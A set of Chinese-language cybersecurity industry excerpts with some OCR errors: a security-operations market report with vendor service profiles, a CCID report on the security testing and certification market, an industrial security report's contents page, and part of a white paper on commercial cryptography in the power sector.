◆在目前安全运营市场初期发展过程中,仍然存在值得关注的问题,解决这些问题将更利于市场未来更有序、均衡的发展: ◆中高级安全人才短缺对安全运营市场供需两侧产生一定制约。技术与产品提升安全水平,但安全人才决定最终效果。培养中高级安全人 才对于实现人机共智、确保安全运营效果至关重要,这是安全运营市场可持续发展的关键因素。 ◆异构安全生态和低开放性对企业安全运营构成较大挑战,解决之道在于积极倡导开放的生态理念,建立标准和接口,促进不同安全产品 的互联互通,从而提升企业安全运营的效率和效果,真正帮助企业实现安全运营工作进步与提升。 安全运营相关法律法规、行业垂直政策以及实网攻防活动的持续发展,从未来五至十年长周期看,安全运营体系建设将成为企业安全能力提升过 程中的核心任务之一。这一趋势将进一步推动安全运营产品和安全运营服务市场需求的快速增长。 ◆安全运营发展离不开技术和模式的迭代升级,以下方向的创新,将引领安全运营市场未来发展趋势: ◆ AlGC在安全运营领域的深化应用。AlI与安全运营的结合已经受到行业内高度关注,与Al+威胁检测不同,Al+ 安全运营可以实现快速的效果 转 化 。ChatGPT 最新成果所展示Al能力的巨大进步,会引起Al在网络安全运营的一系列尝试,并且结果可期,目前国内厂商已经在快速拥 抱Al, 并 在Al助 手 、AI知识库等基础上向Al+ 告警降噪、Al+攻击溯源方向演进。 ◆将网络安全度量方法整合到安全运营体系中,以定量评估安全性能、风险和防御能力。这有助于企业及时发现自身问题,确保安全防御体系 始终处于最优的姿态。在安全运营体系成熟后,网络安全度量将成为安全运营能力提升的重要方向,金融行业已积极探索在网络安全度量方 面的应用。 ◆安全运营服务SECaaS 模式的探索与应用。国外安全运营服务通过SECaaS 模式创造巨大市场,但国内由于信任机制和安全制度差异, SECaaS 模式应用范围受限,安全运营服务规模化发展始终面临较大挑战。在这个过程中,国内厂商开始采用在保证安全数据可控的情况下, 开展行业或区域专属安全运营服务。未来国内安全运营服务市场SECaaS 模式的发展路径和模式演变非常值得关注。 安全运营业务收入过亿的企业全部为综合型安全 厂育: 该收入指以服务为主形成的安全运营业务收 入,不包括单独销售的安全运营类产品。目前收入 超过1亿以上的企业有9家,全部为综合型安全厂商, 具有成熟的安全运营业务模式和安全运营产品,同 时也具备规模化销售渠道和服务交付网络。产品型 或服务型企业安全运营收入目前均没有超过亿元。 ◆ 近90%的安全运营厂高过去3年业务复合增滤均想 过20%: 在过去3年特别时期,市场中绝大多数企 业能保持20%以上增长,是非常不易的,既印证了 市场需求的火热,也说明安全运营是稳定、具有发 展潜力的赛道。 ◆ 安全运营服务由往场运维内安全托管模式转型, 但SECaaS 模式目前还未成主流: 出于客户需求和 自身业务发展考虑,国内以驻场运维为的企业开始 考虑向安全托管模式转型,而在近80%开展安全托 管服务的企业中,只有25%的企业采用SECaaS 为 主的服务模式,大多数企业仍以本地托管或本地+ 远程混合托管模式为主。 ◆ 安全运营平合是企业开展安全运营业务的必备基 确:无论哪种服务模式,安全运营平台都被企业看 作是提升安全运营服务效率和价值的最重要支撑, 90%以上的企业目前均研发了安全运营平台产品。 作为“独立第三方安全运营”首倡者,启明星辰集团北斗立方安全运营中心围绕暂慧城市以及关键基础设施行业客户对安全运营的迫切需求,为政务云、数据 中心、关键信息基础设施及其他行业和中小企业提供安全运营中心建设及安全运营服务。根据不同用户的需求和建设进度,运营中心可加载如标准化远程/现场 网络安全监控,数据安全运营、云安全运营,安全咨询和培训等运营业务模块,构建可持续扩展和装载新业务内容的安全运营模式。如:大数据Al安全运营中 心、数据安全运营中心、云安全运营中心,工业互联网安全运营中心、态势感知运营中心、内网安全运营中心等。 深信服安全运营中心建成于2018年,是国内较早的商业化云端安全运营中心。深信服安全托管服务(MSS)以网络安全“持续有效”为目标,国绕资产。漏洞、 威胁、事件四个风险要素,通过云端安全运营平台和安全专家团队有效协同的“人机共智”模式,提升组织安全风险管控能力和安全工作效果,为用户提供持 续、有效、省心,便捷的安全托管服务, 一同构建7*24持续守护,有效预防和主动闭环的体系化安全运营能力,实现可视化,可衡量,可承诺的安全效果。目 前深信服已建立面向教育、医疗、政务、企业四大行业的安全运营中心,在线服务客户数达到数千家。 绿盟科技开展云安全运营、企业安全运营与城市级安全运营业务。云安全运营基于绿题科技T-ONE CLOUD平台为企事业单位提供网站监测,网站云防护、威胁 检测与响应,外部攻击面管理等订阅式安全运营服务。企业安全运营通过咨询规划、成熟度评估、平台建设、威胁建模、自动化编排等过程,结合云地数据协 同方式。为客户达成全面的企业级安全运营能力。城市级安全运营则聚焦云计算、大数据,物联网、工业互联网等场景,从规划、实施到落地,帮助客户构建 云-网-端体系化安全防护,并同步建设城市网络安全管理体系与运维体系,实现城市网络安全闭环运营管理能力。 安恒安全托曾服务(MS5)是利用安恒信息自主研发的安全托管运营服务平台,以用户资产全生命周期的安全需求为导向,参考IPDRO框架,将专业化人才梯 队、标准化运营流程,智能化安全运营平台深度结合,从资产管理、攻击面管理,漏洞管理、威胁狩猎和应急响应五大核心攻防对抗域持续提供7*24主动、有 效闭环的安全运营保障。安恒信息目前可以提供种安全运营服务模式,包括5aaS模式MS5服务,智慧城市安全运营服务,企业本地/远程安全托管服务等,自前 累计服务客户数已接近上千家。 奇安信安全运营服务是从客户业务视角出发,同企业安全部门共同进行安全运营架构。包括运营组织搭建,事件响应流程,运营平台及工具进行设计,通过外 购或自研安全运营,流程管理等平台及设备,规划对应的工作场地,开展7x24小时的安全监测、综合分析、事件预警、深度分析、应急响应等服务,为客户侧 的网络安全提供了有力保隆。在圆满完成了北京冬奥会和冬残奥会网络安全保隆工作,兑现了北京冬类网络安全“零事故”的承诺后,对客户提供全面安全保 障的能力又得到了大幅度的提升,并且将成功经验广泛复制, 安信天行立足全局,植根行业,以提供专业的网络安全服务为核心,依托丰富的服务经验,以城市级安全运营中心为纽带,畅通技术与管理之间的鸿沟,赋能 区域行业伙伴,实现深度化运营、全方位支撑, 一体化交付等能力,建立从监视、预警、分析、运维。处置的安全闭环流程,构建综合服务平台和技术支撑平 台,以权威的安全服务资质和专业化安全服务团队,提供体系化、全面化的安全运营保障服务,共建安全运营体系,为政务、卫生、纪检,教育、厂电、企业 等各领域千余家单位值息化建设保笃护航, “360数字安全托管运营服务”依托360安全运营数字化协作平台,将360云端数据、专家、能力、探针等建立多维度连接,为客户提供7x24远程 安全实时监测,帮助客户“摸清家底、感知风险、看见威胁、处置攻击、提升能力”,实现安全事件全程可见,可管。可追溯。该服务可向用户提 3 6 0 载 7 日 供弹性,持续化的安全服务。应对高级威胁。“360数字安全托管运营服务”基于被国家,央企客户验证有效的“360数字安全框架”,为用户提供 强大的云上数字化安全运营平台。 “50C+安全运营体系”是腾讯安全面向产业数字化转型推出的新理念,强调以威胁情报运营和攻防对抗为基础,构建起“情报-攻防-服务-生态” 胸讯安全的闭环安全运营体系。目前,腾讯5OC+集成了TIX威胁情报中心、SOC安全运营平台,NDR网络威胁检测与响应,MDR安全运营服务四大产品矩阵 可支撑政企机构建立起技术、人员。流程一体化的安全运营体系,全面提升安全防护能力和安全运营效率。 STARSO 星维九州 星维九州是以MSS\MDR(托管式安全服务)为核心业务方向的新型网络安全服务商和安全运营服务装备供应商,通过建立专业的安全运营团队, 依托中心侧安全运营支撑平台SOSS体系与客户现场侧前哨服务系统,通过安全运营分析用例(U5ECASE)、安全运营剧本、标准化运营流程调度 一二三线安全运营分析师,以安全数据不离场的方式帮助客户完成资产安全治理、暴露面分析、威胁管理服务、脆弱性管理服务等标准化安全服务 工作。目前已接入大中小200余家远程服务客户,覆盖金融、医疗,数字政府,企业等客户。 Q日志易 rizhiyi.cam 日志易始终将自主创新作为公司可持续发展的核心战略之一,以对标SIEM领域巨头5plunk为目标,坚持研发自主可控的大数据分析技术,作为信 创工委会大数据组组长,在国产化适配互认与产品自主可控方面具有领先优势。日志易安全运营中心基于自主开发的纯国产搜索引擎Beaver,支持 100亿条日志量级秒级检索返回,为用户打造集数据采集解析、规则预箸、关联分析、威胁处置等全流程于一体的人工&自动化运营闭环。至今已积 累了金融、制造业、高科技等多个垂直行业头部客户大型安全运营中心案例,井获得客户高度认可。 长扬科技基于对国家工业互联网安全相关政策,法规与标准的持续研究和深度解读,总结超过32个行业领域,4000余家工业企业的安全服务经验, 场科技7 全运营等方面的网络安全服务需求,并且基于用户不同的网络安全服务需求。提供模块化的服务组合。 罗能科表 众智维科技以国内知名的麒麟安全实验室为基础,以AISecOps为核心理念,将机器学习、自然语言处理和深度学习等Al技术应用于安全运营,发展 至今已形成智能化企业安全风险管理、安全资产管理。安全日志管理,以及安全自动化响应、自动化编排和自动化安全运营等15款模块化产品。依 托国家级信息安全课题建立了众智维安全运营中心,以南京为中心辐射全国,为企业客户提供7*24安全托管和安全运营服务,实现“人+产品”的 整体托曾解决方案,帮助客户在安全运营方面实现降本增效。 新华三以主动安全3.0为理念,基于一切皆服务(XaaS),以业务运营为驱动,打造涵盖“按需订阅,云上托管。交钥匙服务”等特色的新一代新华 三云端安全运营中心。综合技术、流程、人员和平台等多个因素,通过技术手段和人文管理相结合的方式,实践出“咨询先行、能力交付。保险托 底”的最佳运营模式,井逐步推出出三层金字塔的业务模型,包含云端安全运营服务、行业级安全运营服务和城市级安全运莺服务,藏盖百行百业, 使企业安全防范体系更加完善、可靠和高效,助力企业实现降本增效。 中国电信安全公司将云网资源禀赋与安全标品融合,打造出具有差异化优势的MSSP安全托曾服务,形成了全网采集。全程防护、内外潮源的一体 化解决方案。此方案通过对海量探针上报的日志进行降噪优化,算法训练得以迅速提升,有效保障关联分析结果的准确性。在响应处置环节,通过 大量且较高的剧本命中率,专家无需进行二次研判工作。此外,电信安全L1-L3级云地协同专家提供1v1贴心服务,将客户体验放在首位。安全运营 专家通过实战经验与行业融合,为金融、互联网、政务、公检法、教育,医疗等不同行业客户输出契合行业属性的最佳实践。 广东网安依托18年网络安全服务经验与业界网络安全运营最佳实践,通过自研的网络安全运营服务平台,集成防御、监测分析与合规审计等专业网 络安全工具,持续监控响应客户安全事件,自动化处置威胁;通过一线,二线与外部专家等组成的专业安全服务团队,为用户提升提升7*24小时网 络安全运营服务。根据客户网络安全能力基础与工作目标,弹性提供托管式与专项安全运营服务,包括安全评估咨询规划,安全监控和事件响应、 安全防护和漏洞管理,攻防演练,安全培意识训与安全合规和审计等服务,在政府与医疗行业积累了丰富的安全运营服务项目经验。 华为乾坤安全云服务解决方案,使用全新云边端一体架构,云端提供整体分析能力,边侧通过天关设备提供边界防护能力,端侧通过EDR提供终端 防护能力。面向客户提供完整安全集成运营服务,客户可实现按需订阅。快速能力部署痛点需求;云端通过云端专家+智能分析算法实现对边侧、端 侧威肋告警快速自动分析响应、智能识别客户本地网络的潜在威胁,并完成告警自动化处置闭环,自动处置率达到95%,从而帮助租户简化本地运 维,提升安全运营与防护实效。 云纷科技以十年安全管理经验及安全研发能力为依托,结合自身对于安全的理解和知识,协同利用开发能力、调用各类自动以及半自动化工具,为 客户提供最切合实际的安全运营及托管服务。其提供的下一代MSSP服务是充分运用了敏捷智能的新技术来应对海量增长的长尾用户群体,通过技 术驱动和集中共享降低每个单一客户投入的成本以确保性价比。云纷科技自研云原生平台InsightX,运用人工智能AI算法,IXtra,UEBA等组件, 将安全实践和安全理论知识快速工具化产品化,来提高安全效率降低企业成本,并对企业提供7x24全天候安全保障。 保旺达运营中心5OC系统以AI和自动化编排为核心,充分采用技术手段,将人、技术和流程高度协同起来,将繁杂的安全运行(尤其是安全响应) 过程梳理为任务和剧本,提供定制化的流程和控制,整合并加速有效网络威胁的调查与缓解,防护能力孤岛化,运营工作碎片化、无序化、重复化等 问题,将安全曾理工作融入到铁塔日常运营活动中,建立了技术,人员。流程一体化的标准安全运营体系。 漠坦尼托管安全服务(M55)包含安全咨询、安全运营、安全评估、安全培训等内容,结合公司多年技术实战经验,致力于满足客户业务安全与监 漠坦尼 平,最终实现合理运用外部资源的自主运营安全,更好地帮助客户解放T生产力,将更多精力聚焦于业务创新本身。 云周習票 n-had 云盾安全服务团队前身为联通集成公司的内部安全服务团队,成立于2008年,拥有数十名具备安全等保测评师.CISP、CCIE。MCSE等专业资质安 全攻防专家,承接联通集团信息化部。网络部、梁道运营中心,软研院等日常安全服务和重保值守等服务。2019年划入云盾智慧,服务范围扩大为 常态化安全运营,风险评估、重保服务,攻防演练、数据安全评估等。慧势态势感知与安全运营平台以构建全局安全数据分析能力为核心,内置威 胁分析智能引擎及安全运营工具,平台现已应用于中国联通集团总部,监测分析集团数十万资产的安全态势,是运营商行业内领先的态势感知平台。 亚店安全 亚信安全M55运营服务依托亚信安全XDR产品解决方案和安全运营专家团队,为企业,教育、医疗、政府、金融等行业客户提供巡检。按需和常态 化安全运营服务。基于XDR的治理框架,根据用户不同的需求,提供了三大托管式安全运营服务模式,将安全产品、服务、,流程以及人员进行案度 打通和融合,帮助客户解决资产漏洞不清晰、真实威胁不可见,告警聚合效果差、产品联动效率低等问题,构建体系化,常态化和实战化的安全运 营能力。将黑客入侵.病毒感染等安全风险降至最低。能够解决的不仅是当下的安全难题,还有适应未来需求的安全布局。 Hilstone 山 石 网 科 山石网科可持续安全运营服务构建了可持续安全监测,安全评估和响应能力。通过设置专业的技术人员岗位,明确岗位职责,通过制定标准工作流 程,规范协同机制。依托山石网科全线产品,利用用户现场环境,开展安全合规、资产梳理、漏洞管理、安全事件监测、威胁分析、事件流程管理 及通报、演示汇报等一系列日常运营工作。可短期快速提升用户安全能力,同时可借助山右网科专业安全服务团队帮助用户培养井建立自己的安全 运营能力: juminc展 聚铭依托团队近20年安全运营平台开发运维经验推出的聚铭下一代智慧安全运营中心产品以“人机共生,智慧运营”为核心理念,依靠大数提挖掘. AI算法,智能降噪等关键技术,构筑全流程自动化的安全动态防御体系。结合用户实际安全场景和业务需求提供专业报告和安全指导,动态优化安 全工作流程、组织架构和配套制度,做到弱人工化、重智能化的安全运营,最终实现安全设备,安全数据,安全管理“效能最大化”的目标。目前 产品已服务全国超3000家客户。 安天 安天常态化安全运营服务可根据客户自身的安全运营成熟度。将安天特色的能力运营支撑点融入到客户的安全运营流程体系中,以威胁对抗为核心 以持续性威胁猎杀为基础手段,结合现场的安全产品和平台,通过“运营体系建设”、“前置安全评估”、“常态安全运营”和“事件应急响应” 四个方面开展日常安全运营,协助客户建设安全运营组织机构,建立并完善安全运营体系,健全安全运营管理制度体系和应急预案体系,强化关键 环节的安全运营协同机制,确保客户的网络安全工作在安全运营组织机构的带领下能井然有序的开层。
standards
当前 ,人类社会正加速迈向数字文明时代 ,伴随数字化 、网络化 、智能化深入发展, 网络安全与政 治安全 、经济安全 、文化安全 、社会安全等领域相互交融 、相互影响, 已成为我国面临的最复杂、 最现实 、最严峻的非传统安全问题之- 。我国正处于加快网络强国 、数字中国建设的重要进程中 如何筑牢网络安全屏障 ,为网络强国 、数字中国建设提供坚实安全保障, 已成为国家的重大课题。 国家高度重视网络空间的安全保障 ,制定了多项政策及法律法规 ,用于指导政企机构提高网络安全 意识 ,提升网络安全技术能力水平。 网络安全测评作为政府保障国家安全 、社会稳定的抓手之- ,在企业网络隐患识别 、安全保障等方 面起着至关重要的作用 。强化新技术新业态下的安全评测和监测能力建设, 提升网络安全防护水平 是中国网络安全建设过程中的必要保障 。因此 ,推进网络安全测评工作 ,积极开展合规性评估, 配 合监管部门进行网络安全监督执法是未来的网络安全建设中的重要工作之- 。在此背景下, 赛迪顾 问于2023年11月编制完成 《中国网络安全测评服务市场研究报告 (2023) 》 ,分析了近几年来中国 网络安全测评与认证服务市场 、等级保护测评与商用密码应用性评估市场的发展现状 ,并对未来市 场发展趋势做出了预测 。以下为报告部分内容节选。 中国网络安全测评与认证服务市场稳定增长 网络安全测评服务及认证中合规性测评服务主要包含网络安全等级保护测评服务 、商用密码应用安 全性评估服务等内容 ,安全认证主要包含安全产品认证 、安全体系认证 、服务资质认证及人员认证 等内容, -般由具有相应资质的机构来提供专业服务, 其中安全认证的市场规模较小 。2022年, 赛 迪顾问统计的中国网络安全测评及认证服务市场规模为54.8亿元 ,增长率为 17.3% 图1 2016-2022年中国网络安全测评及认证服务市场规模及增长率 赛迪顾问发布《中国⽹络安全测评服务市场研究报告 (2023)》 - 安全内参 | 决策者的⽹络安全知识库 数据来源 :赛迪顾问 2023.11 中国网络安全等级保护测评服务市场 自2008年 《信息安全技术信息系统安全等级保护基本要求》 国家标准发布以来 , 等级保护制度作为 网络安全合规管理的重要制度长期以来就发挥着巨大的作用 。2019年 “等保2.0”正式发布并于2019 年12月 1 日正式实施 ,相比 “等保1.0”只针对网络和信息系统的情况 “等保2.0”将云计算 、大数据、 物联网 、工业控制系统等新业态也纳入了监管范畴, 覆盖技术更全面 ,监管范围更广 。2022年, 中 国网络安全等级保护测评服务市场规模达到43.7亿元 ,增长率为 11.2%。 图2 2016 - 2022年中国网络安全等级保护测评服务市场规模与增长 数据来源 :赛迪顾问 2023.11 中国商用密码应用安全性评估服务市场开始显现 《中华人民共和国密码法》 于2020年1 月 1 日正式实施, 其中明确了要开展商用密码应用安全性评 估 。密评工作现在主要依据的标准是国家市场监督管理总局 、中国国家标准化管理委员会在2021年 3 月发布的 《信息安全技术信息系统密码应用基本要求》 其中规定了信息系统第一级到第四级的密 码应用的基本要求 。2019年起各地商用密码应用安全性评估工作展开试点 ,市场规模大约为0.5亿 元 ,到2022年市场规模达到3.8亿。 图3 2018 - 2022年中国商用密码应用安全性评估市场规模与增长 赛迪顾问发布《中国⽹络安全测评服务市场研究报告 (2023)》 - 安全内参 | 决策者的⽹络安全知识库 近年来 , 网络安全的法律法规不断出台, 网络安全产业发展环境逐渐优化 ,合规性的审查和测评机 制愈加完善, 网络安全测评与认证作为审查手段, 随着合规范围的扩大, 市场将迎来高速增长 。赛 迪顾问预测 ,到2025年, 中国网络安全测评及认证服务市场将达到126.6亿元。
standards
2022年工业信息安全态势报告 国家工业信息安全发展研究中心 监测应急所 2023.02 O2 政策动向 O1 技术趋势 C工信安全 01 事件分析 2022年十大典型工业信息安全事件 勒索攻击持续威胁工业信息安全 工业数据泄露事件影响进一步扩大 供应链攻击加剧工业信息安全威胁 σ 地缘政治冲突推动安全风险升级
standards
一、电力行业商用密码应用背景 (一)电力行业面临愈加复杂的网络安全威胁 电力行业网络信息安全形势日益严峻。当前复杂的国际形势下, 全球范围内电力信息系统和网络屡遭网络攻击:巴西电力公司和欧 洲能源巨头 EDP公司等遭勒索软件攻击,印度核电站内网感染恶意 软件,乌克兰某核电厂发生重大网络安全事故,委内瑞拉电力系统 两年内遭受多次网络攻击,美国电力公司遭受DDoS攻击,法国费森 海姆核电站敏感数据被泄露,俄黑客组织对美国核电站实施攻击。 作为关键基础设施的重要组成部分,电力行业网络信息安全不仅关 乎企业信息和经济安全,而且可影响社会安全和国家安全。更保障 电力行业网络信息安全,具有重要的战略意义和现实意义。 电力行业新技术融合应用引入了新的安全风险。近年来,电力 行业对网络和信息技术的依赖程度越来越高,电力物理空间与网络 空间的连通、融合进 一 步加深,随着数字化转型下电力工业技术体 系在开放性、互联互通性上的增强,以及能源网络的结构复杂化、 边界模糊化、形态多样化,网络安全风险化显著增加。与此同时, 能源互联网广泛融合能源生产、传输、交易、消费等各环节数据, 能源电力生产中的信息获取方式、存储形态、传输渠道、处理方法 以及对网络安全保障与防护的需求均发生了显著的变化。网络安全 不再仅仅只是影响虚拟空间,而是将会通过电力信息物理耦合关系 渗透到现实电力 一次系统,严重影响电力 一次系统的安全、稳定、 高效运行。 (二)推进商用密码应用是落实政策文件要求 法律法规明确提出商用密码应用要求。 面对国家安全的新形势, 我国已在多部法律法规中明确规定了密码应用的要求,包括《中华 人民共和国密码法》、《中华人民共和国网络安全法》、《中华人 民共和国数据安全法》、《关键信息基础设施安全保护条例》、《商 用密码管理条例(修订草案)》等,突出强调了关键信息基础设施 和网络安全等级保护第三级及以上信息系统的密码应用监管,并实 施商用密码应用安全性评估和安全审查制度。 1.主管部门和责任单位发布系列指导文件 国家能源局统筹指导体系推进。2018年,国家能源局印发《关 于加强电力行业网络安全工作的指导意见》,明确提出加快密码基 础设施建设,包括在重要业务、重要领域实施密码保护,完善电力 行业密码支撑体系,实现电力行业密码基础设施 一体化管理;健全 电力行业密码检测手段,开展密码应用安全性评估。2021年国家能 源局印发的《电力安全生产“十四五”行动计划》,将“加快推进 密码应用基础设施建设、密码改造和商用密码应用安全性评估”作 为网络与信息安全基础能力提升攻关重点之一。 责任单位扎实推进行业密码应用。根据中办、国办2019年36 号文,加强金融和重要行业领域密码应用要求,国家电网编制了《国 家电网有限公司商用密码应用与建设发展规划(2018-2022年)》, 印发《国家电网有限公司商用密码应用与建设发展工作要点》,明 确提出了建设统一密码应用服务体系的工作方向和要求。按照“合 法合规、安全高效、集中统一、长效发展”的原则,确立公司密码 “五统一”的工作思路(统一规划、统一标准、统一建设、统一运 营和统一服务)。分阶段建成技术领先、理念超前的“1+2+3”的统 一 密码应用服务体系( 一 个中心+两种技术体制+形成三种核心能 力)” 二 、电力行业商用密码应用典型场景 现代电力生产和经营管理都已具备高度网络化、系统化、自动 化的特征,以网络、数据库、计算机自动控制技术为代表的信息处 理技术已经渗透到电力生产、经营管理的各个方面。此外,能源互 联网技术、云计算、大数据、物联网、5G、区块链等新技术也逐步 应用到电力行业重要信息系统,在为电力行业提质增效的同时也带 来了新的安全挑战。密码作为网络信息安全的核心技术和基础支撑, 在电力行业网络信息安全防护体系中占据重要地位。以下从力行业 密码基础设施建设、重要生产网络和信息系统、新技术赋能等方面 展开详述型场景下的商用密码应用现状和需求。 (一)电力行业密码基础设施 密码基础设施是提供机密性、完整性、真实性、不可否认性等 安全服务的基础资源,是实现密码应用的重要组成。在国家能源局 的指导下,国网公司成立商用密码管理中心,并在各网省公司建设 统 一 密码服务平台。商用密码管理中心负责落实国家和国网公司密 码政策要求,统一密码基础设施和统一密码服务平台的建设、管理、 对外服务和运营,以及建设密码应用监控系统,并将统 一 密码基础 设施和统 一 密码服务平台的运行监控、风险管控纳入网络安全督察 体系。 图 1 商 用 密 码 体 系 建 设 示 意 图 统 一 密码基础设施作为自建密码服务的载体,可实现密钥的统 一 发放,实现密钥在生产、存储、传输、备份、更新、吊销等全生 命周期的管理。统 一 密码服务平台作为衔接统 一 密码基础设施和各 业务系统密码应用的纽带,可提供身份认证、电子签名验签、数据 加解密等密码应用服务。 国网公司统一密码基础设施全面支撑用电信息采集、配电检修、 “网上国网”、智慧能源服务、电网资产统一身份编码和物联网终 端安全接入等各类业务和应用场景,保障主站、通信通道、终端的 和数据等安全,是电力物联网安全防护体系的核心内容。 目前,全国数亿只智能电表中全部嵌入了密码芯片,对用电数 据进行加密,实现由原来的人员抄表、数据“裸奔”变成远程采集 和加密传输,电费结算更加安全高效。应用密码技术为电动汽车发 放数字证书,通过在充电桩中安装密码芯片,确保电动汽车充电、 计费安全。 (二)重要生产网络和信息系统 1 . 电力监控系统 现代电力工业高度依赖计算机、通信和控制技术,支持电力发、 输、变、配、用及调度等环节的电力监控系统已成为电力生产运行 控制不可或缺的一部分。鉴于此电力行业发布了《电力系统安全防 护规定》(国家发展和改革委员会令2014年第14号令)、2015年 2月国家能源局发布《国家能源局关于印发电力监控系统安全防护总 体方案等安全防护方案和评估规范的通知》(国安能【2015】36号) 文件等政策标准。并且在电力发、输、变、配、用及调度等各个环 节均配备有相应运行的电力监控系统,各系统之间遵循“横向隔离” 原则,并通过专用的电力安全防护设备实现各个系统之间数据交互。 电力监控系统安全防护工作应当落实国家信息安全等级保护制 度,按照国家信息安全等级保护的有关要求,坚持“安全分区、网 络专用、横向隔离、纵向认证”的原则,保障电力监控系统的安全。 针对重点防护的调度中心、发电厂、变电站,在生产控制大区与广 域网的纵向连接处应当设置经过国家指定部门检测认证的电力专用 纵向加密认证装置或者加密认证网关及相应设施,实现双向身份认 证、数据加密和访问控制;对于网纵向通信无论采用何种通信方式, 应当对控制指令与参数设置指令使用基于非对称加密算法的认证加 密技术进行安全防护;同时调度数据网未覆盖到的电力监控系统的 数据通信优先采用电力专用通信网络,不具备条件的也可以采用公 用通信网、无线网络等通讯方式,使用上述通讯方式时应当设立安 全接入区、并采用安全隔离、访问控制、认证及加密等安全措施。 基于以上电力行业网络安全相关政策要求,电力行业不断完善 电力监控系统安全防护体系,加快实现我国商用密码算法在电力监 控系统各个环节的相应的应用,积极推进基于国产密码算法的安全 防护技术体系建设。 图 2 电 力 监 控 系 统 总 体 架 构 示 意 图 电力监控系统的安全I 区是电力生产的重要环节,也是全防护 的重点与核心,对系统运行的实时监控,纵向使用电力调度数据网 络或专用通道;安全II 区是电力生产的必要环节,使用电力调度数 据网络,与控制区(安全I 区)中的系统或功能模块联系紧密;安 全 III 区主要生产管理系统;安全IV 区纯管理系统。基于电力监控 系统各区域的系统实际应用情况,通过部署 一 系列符合相应政策要 求的电力专用安全产品以实现对电力生产控制大区和管理信息大区 各电力监控系统的安全防护,以及对用户供配电网络和用电设备的 不间断保护和监控,从而提高供配电可靠性和自动化水平,最终构 建可靠、安全、先进的供配电系统。 图3电力监控系统输电与用电网络架构示意图 纵向加密装置是电力监控系统安全防护体系的重要防线。依 据 《电力监控系统网络安全防护导则》,电力监控系统在国调、网调、 省调、地调、县调间,以及各级调度机构与其直调的发电厂、变电 站之间的纵向边界,均部署纵向加密认证装置及相应措施,形成电 力监控系统纵向从下到上四道安全防线,同事采用认证、加密、访 问控制等技术措施实现数据的远方安全传输以及纵向边界的安全防 护,达成高安全等级控制区安全防护强度的累积效应,保障生产控 制大区的重要业务系统安全。 依据“安全分区、网络专用、横向隔离、纵向认证”防护原则, 纵向加密装置部署于生产控制区实时控制区(安全I 区 ) 及 生 产 控 制区非实时控制区(安全I 区),保障纵向数据交互时的数据完整 性和保密性。纵向加密装置通常具备以下特性: 一是利用隧道加密 技术为用户构建安全可靠的虚拟专用网络,不仅提供基本的数据加 解密功能,而且具备数据包完整性认证、IP 地址封装解密、安全策 略审查等安全功能;二是密钥管理采用公私钥体制,符合X.509 标 准,使用BASE-64 编码,由调度证书服务系统一签发;三是产品通 过了国家主管部门的审批和技术鉴定,采用国家主管部门审批通过 的专用密码算法;四是采用三级密钥管理,包括主密钥、设备公私 钥(设备公钥以证书请求方式导出,由证书服务系统签发成设备证 书并发布)和作密钥,密钥同步的双方首先需要相互验证身份,且 工作密钥以SM2 算法加密传送实时产生并定期自动更换;五是实行 五类安全证书机制,即根证书、操作员证书、管理中心证书、纵向 认证设备证书、对机证书;六是装置协商的会话密钥采用国电专用 对称密码算法芯片预置的SSF09 算法,装置通过该会话密钥对电力 调度业务报文进行保护,在保证下行控制数据保护强度的同时,确 保了上行状态数据的实时性。 发、输、变、配、用等环节的密码应用需求各有侧重。在发电侧, 发电厂内部重要电力监控系统(DCS、PLC、SIS 等)对实时性的要求 较高,密码算法的引入将增加业务时延,对控制系统的运行安全和 运行效率可产生负面影响,因此发电侧控制系统密码应用需要实时 性好、高可靠的密码实现方案,在保障发电业务平稳运行的同时实 现对各种控制指令和调节指令的数据加密和身份鉴别。在输电侧, 针对数据采集、传输及交换等环节,使用纵向加密认证网关、安全 加密模块、安全接入平台、安全隔离装置等实现输电监控系统的安 全保障。在变电侧,一是站控层、间隔层及过程层中有关控制指令 需要使用密码技术进行安全认证与鉴别,二是变电站站内应用需要 使用可靠、可扩展的密码模块。在配电侧, 大多数仅实现了配电终 端对主站的单向身份认证,遥信、遥测数据和终端配置参数等敏感 数据缺乏必要的安全防护;现场手持运维终端对配电终端的访问控 制仅通过简单的口令实现认证,缺乏必要的强认证和访问控制权限 管理措施。在用电侧,对于用电、计量、营销等数据的采集、处理、 存储等环节需要使用密码技术进行完整性保护和隐私保护。同时, 计量自动化系统、电动汽车充换电系统等新业务系统也提出了密码 应用需求。 2.互 联 网 应 用 场 景 当前,智能终端和物联网、云计算、大数据等技术运用加速推 进信息技术和通信技术的融合,促进移动互联网高速发展。移动互 联网应用技术,就是借助移动互联网终端(如手机、平板等)实现 传统的互联网应用或服务。 互联网应用需要严格遵守密码管理条例,数据传输、存储、使 用都需要使用商用密码相关技术,以国家电网网上国网APP 为例。 网上国网App 是国网公司官方统一线上服务入口,集“住宅、电动车、 店铺、企事业、新能源”五大使用场景,提供高低压居民新装、企业 新装,充电桩报装、线上办电、信息查询、电费交纳、用能分析、 能效诊断、找桩充电、光伏新装、故障报修、能效服务、在线客服、 图 4 上 国 网 架 构 图 在网络安全上,采用https 接入网关提供初始化验证和加密通 信通道。在数据安全上,用户鉴别采用SM3 、SM4 等算法加密存储, 采用 SM3 、SM4等算法对数据加密传输。在终端安全上,通过终端证 书进行身份验证;在应用安全上,开展移动应用安全加固,通过数 字证书、数据加密保证移动应用安全,接入时采用 IP 鉴 权 、MAC 校 验、身份鉴别等方式保证应用系统接口安全。 3.配 网 自 动 化 系 统 配网自动化的现行状态集合了通信、传感和计算机及其网络技 术,在配网发展实践中,配网自动化技术表现出较高优势。 目前,配网自动化系统采用加密网关和加密模块来保护配网系 统数据在公网传输中的数据安全。但是报文在I 区采集服务器与安 全接入区采集服务器之间是明文状态传输(架构图如下),存在恶 意篡改或回放重发等风险,服务器与终端都无法判断报文是否准确。 图5配网自动化系统架构图 图 6 配 网 自 动 化 系 统 数 据 通 信 架 构 图 在整个数据通信路径中,安全接入区服务器仅具有通信数据采 集、转发功能,不直接生产遥控指令下发;另外,仅有主站加密网 关和终端加密模块之间具备加密通信防护能力,主站端从安全区 I 内部发出的指令或者报文没有任何防护能力和身份验签能力。 在 I 区采集服务器和安全接入区采集服务器加入指令防篡改装 置,对遥信报文、遥测报文、遥控报文等报文数据增加签名验签, 实现交互报文数据防篡改,保证遥信、遥测以及遥控安全性。公网 部分延用加密网关到加密终端之间原有的 IPSec VPN隧道进行加密 保护。 I 区采集服务器通过调用指令防篡改装置访问接口进行报文签 名验签,本方案从业务源头对业务报文进行防篡改保护,为减少对 现有网络拓扑和I 